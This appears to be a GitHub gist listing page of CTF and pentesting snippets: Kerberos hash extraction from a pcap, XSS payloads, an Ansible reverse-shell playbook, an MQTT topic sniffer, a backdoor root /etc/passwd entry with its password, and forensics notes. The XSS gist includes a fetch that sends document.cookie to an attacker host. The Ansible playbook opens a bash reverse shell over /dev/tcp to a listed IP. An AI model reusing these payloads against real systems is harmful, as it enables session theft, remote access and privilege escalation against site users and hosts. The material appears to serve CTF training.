Skip to content

Instantly share code, notes, and snippets.

View Reelix's full-sized avatar
🏠
Working from home

Reelix Reelix

🏠
Working from home
View GitHub Profile
@Reelix
Reelix / find-kerb.py
Last active April 10, 2024 14:17
Find a kerberos handshake hash in a .pcap file in hashcat format
import socket
import pyshark
from pprint import pprint
data = pyshark.FileCapture("C:/Reelix/HTB/Office/Latest-System-Dump-8fbc124d.pcap", display_filter="kerberos")
print("Searching for Kerberos packets...")
for pkt in data:
if "Kerberos" in pkt:
dirs = dir(pkt["Kerberos"])
if ("cnamestring" in dirs) and ("cipher" in dirs) and ("etype" in dirs) and ("realm" in dirs):
@Reelix
Reelix / xss.js
Created April 10, 2024 09:57
XSS Payloads
// Test For Image
<img src='http://ip:port/xss' />
// Test For Fetch
<img src=x onerror=fetch('http://ip:port/xss2' />
// Fetch Cookie Stealing
<img src=x onerror=fetch('http://ip:port/cookie?cookie='+document.cookie) /> // TODO: b64 encode cookie
// TODO: Fetch entire page contents
@Reelix
Reelix / ConsoleApp.cs
Created February 20, 2024 15:28
A template file for console-based CTF challenges that require interaction with a server in C#.
using System.Net;
using System.Net.Sockets;
using System.Text;
namespace ConsoleApp1
{
internal class Program
{
static void Main(string[] args)
{
@Reelix
Reelix / a.js
Created May 5, 2023 11:24
XSS Test
<script>alert('Reelix');</script>
@Reelix
Reelix / reverse-shell.yml
Created March 18, 2023 12:02
Ansible Playbook Reverse Shell
- hosts: localhost
tasks:
- name: rev
shell: bash -c 'bash -i >& /dev/tcp/10.10.14.22/443 0>&1'
@Reelix
Reelix / mqtt_multiclient.py
Created March 10, 2023 10:44
A MQTT client that connects using MQTTv31, MQTTv311, MQTTv5 simultaneously and subscribes to every topic.
# https://shamsher-khan.medium.com/broker-tryhackme-writeup-93202a3f778
# https://pypi.org/project/paho-mqtt/#client
import paho.mqtt.client as mqtt
import threading
import sys
import ipaddress
IP = ""
try:
@Reelix
Reelix / passwd
Created November 18, 2022 11:18
Sample /etc/passwd entry for a root user (UNSAFE)
reelix:$1$Nq8UgW36$58WHg7G1iMta.ckiAUXVg0:0:0:root:/root:/bin/bash
Pass: reelix
@Reelix
Reelix / fix-oracle-firewall.txt
Created November 18, 2022 07:53
Fix Oracle Firewall Rules
1.) sudo nano /etc/iptables/rules.v4
2.) sudo su
3.) iptables-restore < /etc/iptables/rules.v4
4.) exit # su
5.) sudo iptables -L INPUT # Verify your rule is there - Might have a name instea of the port
6.) Sign into https://cloud.oracle.com/
7.) Search for "security lists" and click the link on the left
@Reelix
Reelix / brute.cs
Created November 17, 2022 20:20
Brute Force Numerical Cryptography Ciphertext
static void Main(string[] args)
{
Console.WriteLine("Input path to numerical ciphertext.");
string path = Console.ReadLine();
string input = File.ReadAllText(path);
int[] intList = input.Split(' ').Select(int.Parse).ToArray();
int intListLength = intList.Length;
StringBuilder final = new StringBuilder();
for (int n = 1; n < 100000; n++)
{
@Reelix
Reelix / volatility-cheatsheet.txt
Created September 9, 2022 18:56
Reelix's Volatility Cheatsheet
0.) Update: https://www.volatilityfoundation.org/releases
1.) General analysis (Mainly used to get Profiles)
- volatility.exe -f file.raw imageinfo
Eg: Suggested Profile(s) : Win7SP1x64, WinXPSP2x86, WinXPSP3x86
2.) List Processes
- volatility.exe -f file.raw --profile=ProfileFromAbove pslist